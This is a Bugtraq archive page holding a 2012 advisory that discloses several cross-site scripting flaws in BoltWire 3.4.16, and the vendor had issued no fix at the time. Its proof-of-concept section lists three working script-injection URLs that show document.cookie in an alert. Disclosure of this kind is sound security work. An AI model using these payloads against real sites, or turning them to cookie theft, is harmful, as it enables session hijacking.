Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

BoltWire 3.4.16 Multiple XSS vulnerabilities

From: sschurtz () darksecurity de
Date: Sun, 15 Jan 2012 09:47:23 GMT
Advisory:               BoltWire 3.4.16 Multiple XSS vulnerabilities
Advisory ID:            SSCHADV2012-001
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on BoltWire 3.4.16
Vendor URL:             http://www.boltwire.com/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

BoltWire 3.4.16 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/bolt/field/index.php?p=main&help='";</script><script>alert(document.cookie)</script>
http://[target]/bolt/field/index.php?";</a><script>alert(document.cookie)</script></
http://[target]/bolt/field/index.php?p=main&action='";</a><script>alert(document.cookie)</script></&file=file.jpg

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt
Previous By Date Next
Previous By Thread Next

Current thread: